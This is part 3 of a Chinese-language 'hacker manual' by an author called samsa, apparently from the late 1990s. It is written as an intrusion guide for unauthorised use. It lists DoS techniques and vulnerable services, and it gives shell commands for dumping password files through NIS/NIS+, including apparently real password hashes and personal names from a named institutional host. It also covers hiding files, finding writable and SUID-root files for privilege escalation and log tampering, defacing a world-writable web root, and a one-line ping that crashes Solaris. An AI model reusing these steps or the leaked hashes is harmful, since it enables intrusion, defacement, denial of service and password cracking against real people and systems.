当前位置:Linux教程 - Linux - samsa 黑客手册(3)

samsa 黑客手册(3)



        
    作者[samsa]
    2) 远程控制
    2.1) DoS攻击
    2.1.1) Syn-flooding
    向目标发起大量TCP连接请求,但不按TCP协议规定完成正常的3次握手,导致目标系统等待# 耗费其网络资源,从而导致其网络服务不可用。
    2.1.2) Ping-flooding
    向目标系统发大量ping包,i.e.ICMP_ECHO包,使目标的网络接口应接不暇,其网络资源被耗尽.
    2.1.3) Udp-stroming
    类似2.1.2)发大量udp包。
    2.1.4) E-mail bombing
    发大量e-mail到对方邮箱,使其没有剩余容量接收正常邮件。
    2.1.5) Nuking
    向目标系统某端口发送一点特定数据,使之崩溃。
    2.1.6) Hi-jacking
    冒充特定网络连接之一放向网络上发送特定包(FIN或RST),以中止特定网络连接;
    2.2) WWW(远程执行)
    2.2.1) phf CGI
    2.2.3) campus CGI
    2.2.4) glimpse CGI
    (samsa:在网上看见NT下也有一个叫websn.exe的buggy CGI,详情不清楚)
    2.3) e-mail
    同1.7,利用majordomo(ver. 1.94.3)的漏洞
    2.4) sunrpc:rexd
    据说如果rexd开放,且rpcbind不是secure方式,就相当于没有口令,可以任意远程运行目标机器上的过
    2.5) x-windows
    如果xhost的access control is disabled,就可以远程控制这台机器的显示系统,在上面任意显示,还可以偷窃键盘输入和显示内容,甚至可以远程执行...

    四、溜门撬锁
    一旦在目标机上获得一个(普通用户)shell,能做的事情就多了
    1) /etc/passwd , /etc/shadow
    能看则看,能取则取,能破则破
    1.1) 直接(no NIS)
    $ cat /etc/passwd
    ......
    1.2) NIS(yp:yellow page)
    $ domainname
    cas.ac.cn
    $ ypwhich -d cas.ac.cn
    $ ypcat passwd
    1.3) NIS+
    ox% domainname
    ios.ac.cn
    ox% nisls
    ios.ac.cn:
    org_dir
    groups_dir
    ox% nisls org_dir
    org_dir.ios.ac.cn.:
    passwd
    group
    auto_master
    auto_home
    bootparams
    cred
    ethers
    hosts
    mail_aliases
    sendmailvars
    netmasks
    netgroup
    networks
    protocols
    rpc
    services
    timezone
    ox% niscat passwd.org_dir
    root:uop5Jji7N1T56:0:1:Super-User:/:/bin/csh:9841::::::
    daemon:NP:1:1::/::6445::::::
    bin:NP:2:2::/usr/bin::6445::::::
    sys:NP:3:3::/::6445::::::
    adm:NP:4:4:Admin:/var/adm::6445::::::
    lp:NP:71:8:Line Printer Admin:/usr/spool/lp::6445::::::
    smtp:NP:0:0:Mail Daemon User:/::6445::::::
    uucp:NP:5:5:uucp Admin:/usr/lib/uucp::6445::::::
    listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::
    nobody:NP:60001:60001:Nobody:/::6445::::::
    noaccess:NP:60002:60002:No Access User:/::6445::::::
    guest:NP:14:300:Guest:/hd2/guest:/bin/csh:10658::::::
    syscd:qkPu7IcquHRRY:120:10::/usr/syscd:/bin/csh:::::::
    peif:DyAkTGOg/2TCY:819:800:Pei Fei:/home/peif:/bin/csh:10491::::::
    lxh:T4FjqDv0LG7uM:510:500:Liu Xuehui:/home/lxh:/bin/csh:10683::::::
    fjh:5yPB5xLOibHD6:507:500:Feng Jinhui:/home/fjh:/bin/csh:10540::::::
    lhj:UGAVVMvjp/9UM:509:500:Li Hongju:/home/lhj:/bin/csh:10142::::::
    ....
    (samsa:gotcha!!!)
    2) 寻找系统漏洞
    2.0) 搜集信息
    ox% uname -a
    SunOS ox 5.5 Generic sun4d sparc SUNW,SPARCserver-1000
    ox% id
    uid=820(ywc) gid=800(ofc)
    ox% hostname
    ox
    ox% domainname
    ios.ac.cn
    ox% ifconfig -a
    lo0: flags=849 mtu 8232
    inet 127.0.0.1 netmask ff000000
    be0: flags=863 mtu 1500
    inet 159.226.5.188 netmask ffffffc0 broadcast 159.226.5.191
    ipd0: flags=c0 mtu 8232
    inet 0.0.0.0 netmask 0
    ox% netstat -rn
    Routing Table:
    Destination Gateway Flags Ref Use Interface
    -------------------- -------------------- ----- ----- ------ ---------
    127.0.0.1 127.0.0.1 UH 0 738 lo0
    159.226.5.128 159.226.5.188 U 3 341 be0
    224.0.0.0 159.226.5.188 U 3 0 be0
    default 159.226.5.189 UG 0 1198
    ......
    2.1) 寻找可写文件、目录
    ox% cd /tmp
    ox% mkdir .hide
    ox% cd .hide
    ox% ls -ld `find / \( \( -type d -o -type f \) -a \( -perm -0002 -o -group 8
    00 \
    -a -perm -0020 \) \) -print` >.wr
    (samsa:wr=writables:可写目录、文件)
    ox% grep ^d .wr > .wd
    (samsa:wd=writable directories:目录)
    ox% grep ^- .wr > .wf
    (samsa:wf=writable files:普通文件)
    ox% ls -l `find / \( -perm -4000 -a -user root \) -print` >.sr
    (samsa:sr=suid roots)
    2.1.1) 系统配置文件可写:e.g.pam.conf,inetd.conf,inittab,passwd,etc.
    2.1.2) bin 目录可写:e.g./usr/bin,/usr/local/bin,etc. (see:Trojan horses)
    2.1.3) log 文件可写:e.g./var/adm/wtmp,/var/adm/messges,etc.(for track-erasin
    g)
    2.2) 篡改主页
    绝大多数系统 http 根目录下权限设置有误!不信请看:
    ox1% grep http /etc/inetd.conf
    ox1% ps -ef | grep http
    http 7538 251 0 14:02:35 ? 0:02 /opt/home1/ofc/http/httpd/htt
    pd -
    f /opt/home1/ofc/http/httpd/conf/httpd.conf
    http 7567 251 0 15:16:46 ? 0:01 /opt/home1/ofc/http/httpd/htt
    pd -
    f /opt/home1/ofc/http/httpd/conf/httpd.conf
    root 251 1 0 May 05 ? 3:27 /opt/home1/ofc/http/httpd/htt
    pd -
    f /opt/home1/ofc/http/httpd/conf/httpd.conf
    ......
    ox1% cd /opt/home1/ofc/http/httpd
    ox1% ls -l |more
    total 530
    drwxrwxrwx 11 http ofc 512 Jan 18 13:21 English
    -rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
    drwxr-sr-x 2 http ofc 512 Dec 24 15:20 cgi-bin
    drwxr-sr-x 2 http ofc 512 Mar 24 1997 cgi-src
    drwxrwxrwx 2 http ofc 512 Jan 12 15:05 committee
    drwxr-sr-x 2 root ofc 512 Jul 2 1998 conf
    -rwxr-xr-x 1 http ofc 203388 Jul 2 1998 httpd
    drwxrwxrwx 2 http ofc 512 Jan 12 15:06 icons
    drwxrwxrwx 2 http ofc 3072 Jan 12 15:07 images
    -rw-rw-rw- 1 http ofc 7532 Jan 12 15:08 index.htm
    drwxrwxrwx 2 http ofc 512 Jan 12 15:07 introduction
    drwxr-sr-x 2 http ofc 512 Apr 13 08:46 logs
    drwxrwxrwx 2 http ofc 1024 Jan 12 17:19 research
    (samsa:哈哈!!差不多全都可以写,太牛了,改吧,还等什么??)
    3) 拒绝服务(DoS:Denial of Service)
    利用系统漏洞捣乱
    e.g. Solaris 2.5(2.5.1)下:
    $ ping -sv -i 127.0.0.1 224.0.0.1
    PING 224.0.0.1 56 data bytes
    (samsa:于是机器就reboot乐,荷荷)

    发布人:netbull 来自:sinbad网络安全